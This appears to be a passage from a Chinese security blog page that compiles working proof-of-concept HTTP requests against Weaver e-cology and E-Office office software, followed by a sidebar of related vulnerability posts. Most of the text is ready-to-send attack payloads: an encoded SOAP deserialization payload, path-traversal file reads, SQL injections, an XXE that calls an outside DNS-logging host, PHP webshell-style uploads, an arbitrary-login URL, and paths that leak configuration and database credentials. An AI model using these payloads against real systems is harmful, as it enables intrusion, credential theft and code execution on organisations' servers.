#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#116;&#114;&#97;&#110;&#115;&#102;&#101;&#114;&#70;&#108;&#97;&#118;&#111;&#114;&#115;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#97;&#116;&#97;&#72;&#97;&#110;&#100;&#108;&#101;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#76;&#101;&#110;&#62;&#48;&#60;&#47;&#100;&#97;&#116;&#97;&#76;&#101;&#110;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#47;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#32;&#114;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#61;&#39;&#46;&#46;&#47;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#39;&#47;&#62;&#10;&#32;&#32;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;&#10;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;</web:string>
<web:string>2</web:string>
</web:doCreateWorkflowRequest>
</soapenv:Body>
</soapenv:Envelope>

泛微e-cology getE9DevelopAllNameValue2任意文件读取漏洞

GET /api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

泛微e-Weaver SQL注入


GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version HTTP/1.1
Host:

泛微OA e-cology前台接口SQL注入漏洞


POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host:***
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1

formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1

泛微OA E-Cology9 browser.jsp SQL注入漏洞(CNVD-2023-12632)


POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
DNT: 1
Connection: close
Cookie: ecology_JSessionid=aaaDJa14QSGzJhpHl4Vsy; JSESSIONID=aaaDJa14QSGzJhpHl4Vsy; __randcode__=28dec942-50d2-486e-8661-3e613f71028a
Upgrade-Insecure-Requests: 1

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%30%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%36%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%30%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%36%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37

泛微 e-cology 前台SQL注入漏洞

app.name="泛微 e-cology 9.0 OA"

验证poc:

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close        

fileid=1+WAITFOR+DELAY+%270:0:2%27&isFromOutImg=1

 泛微E-cology XML外部实体注入漏洞

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: 
Content-Type: application/xml
Content-Length: 53

<M>
    <syscode>
        666
    </syscode>

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host:****
Content-Type: application/xml


POST /rest/ofs/ProcessOverRequestByXml HTTP/1.1
Host:****
Content-Type: application/xml

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 35
Content-Type: application/xml
Accept-Encoding: gzip


<?xml version="1.0"?>
<!DOCTYPE ANY [
    <!ENTITY % d SYSTEM "http://wutvavcfzj.dnstunnel.run">
    %d;
]>
<a>&xxe;</a>

 

泛微 e-cology  ofsLogin任意用户登录漏洞

/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1&timestamp

泛微e-cology CheckServer.jsp SQL注入

/mobile/plugin/CheckServer.jsp?type=mobileSetting

泛微E-Office系列

泛微 E-Office文件上传漏洞(CVE-2023-2523)


POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1 
Host:your-ip  
Cache-Control:max-age=0  
Upgrade-Insecure-Requests:1  
Origin:null  
Content-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt  
Accept-Encoding:gzip, deflate
Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection:close
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="upload_quwan"; filename="1.php."
Content-Type:image/jpeg
<?phpphpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition:form-data; name="file"; filename=""
Content-Type:application/octet-stream
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

泛微 E-Office 任意文件下载:

/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:\Windows\System32\drivers\etc\

泛微E-Office信息泄露漏洞(CVE-2023-2766)

GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip



GET /building/config/config.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

泛微E-Office文件上传漏洞(CVE-2023-2648)

 Poc (POST)

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 10.211.55.3:8082
User-Agent: test
Connection: close
Content-Length: 491
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream

--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--

 

 http://10.211.55.3:8082/attachment/1727543347/666.php

泛微E-Office UserSelect未授权访问漏洞


GET /UserSelect/ HTTP/1.1
Content-Type: application/josn

泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞


GET /mysql_config.ini HTTP/1.1
Content-Type: application/josn

yggcwhat
关注
【nday】复现OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 3124
e-cology是一款由网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
未公开 0D E-Office E-mobile/App文件上传漏洞
最新发布
ZeroDay001的博客
02-22 165
E-Office E-mobile/App文件上传漏洞这是一个集内容管理与发布于一体的智能平台,广服务于新闻媒体及内容创作行业。平台支持多端协同和多渠道分发,拥有素材管理、内容编辑、智能审核等核心功能,并通过技术辅助创作与数据分析,显著提升内容生产效率与传播质量。从内容采集到发布实现全流程覆盖,优化工作流程,提高传播的精准度和时效性,帮助用户在数字化内容生态中实现高效协作与影响力扩展。
OA后台远程代码执行漏洞
Ha1ey的博客
12-19 591
OA代码审计
最新漏洞汇总----实时更新!!!_漏洞,2024年最新网络安全程序员必会
erthre的博客
04-16 2752
知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。(img-tih2xQ74-1713254808442)]app.name=“ e-cology 9.0 OA”
软件漏洞-OA-汇总
weixin_30855099的博客
09-20 3423
SQL注入 前台SQL注入 用户名:admin' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a 密码: 1 验证页面参数 -loginid (1)/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.js...
最新漏洞汇总----实时更新!!!_漏洞,2024年最新为什么网络安全能最好地改变网络安全
2401_83974087的博客
04-14 1255
q=0.9!!Win64;x64;;v=b3;x64;;
云桥前台文件上传漏洞-202408
网络安全。
08-18 1699
静态分析代码流程:先看方法有没有声明,没有声明使用 jd-gui 反编译工具 search 搜索要跳转的类方法,定位到后再去 idea 里查看有无声明,再无声明可结合 jd-gui、jar-analyzer工具搜索查找。动态分析:每一步都可以打断点动态分析一下,可以随时在每一步骤中用到的方法进行断点分析。
E-Cology getFileViewUrl SSRF漏洞复现
0xSec
07-09 2566
E-Cology getFileViewUrl 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
2021-OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
OA V8 SQL注入漏洞 漏洞描述 OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 OA V8 FOFA app=“-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
最新漏洞汇总----实时更新!!,网络安全开发知识体系
2201_75863152的博客
04-11 1018
title=“移动管理平台-企业管理”q=0.9!!
2024HW必修高危漏洞集合-v3.0
07-08
#### 二、漏洞汇总与分析 本节将详细介绍《2024HW必修高危漏洞集合_3.0》中列举的部分高危漏洞及其影响。 ##### 1. 远程代码执行漏洞 远程代码执行漏洞是HW攻防演练中最为常见的类型之一。这类漏洞允许攻击者在未...
【1day】e-office OA SQL注入漏洞学习
记录并分享学习安全的知识点..
10-17 603
e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。e-office OA存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
e-officev10.0发布2018年10月31日标准补丁
e-officev10.0是网络科技股份有限公司(简称)开发的一款企业级协同办公软件,该软件广应用于企业的日常办公、项目管理、资源调度、通讯协作等多个方面,旨在提高企业内部工作效率,实现信息共享和...
最新漏洞汇总----实时更新!!(1),阿里内部网络安全笔记火爆IT圈
m0_60666452的博客
04-07 1490
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
最新漏洞汇总----实时更新!!!_漏洞(1),腾讯大牛教你自己写网络安全框架
2401_83974087的博客
04-14 635
app.name=“ e-cology 9.0 OA”
最新漏洞汇总----实时更新!!!_漏洞(2),系统学网络安全从零开始
erthre的博客
04-16 1062
app.name=“ e-cology 9.0 OA”
e-cology WorkflowServiceXml SQL注入漏洞(POC)
m0_62584974的博客
07-16 1561
e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。分析:基于当前情报,漏洞可能被用于攻击e-Cology WorkflowServiceXml系统,建议更新系统补丁、加强输入验证和限制访问权限。更新e-Cology WorkflowServiceXml系统到最新版本。
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 8458
漏洞复现 OA E-Cology V9 browser.jsp SQL注入漏洞
OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="-协同办公OA" SQL注入 在OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值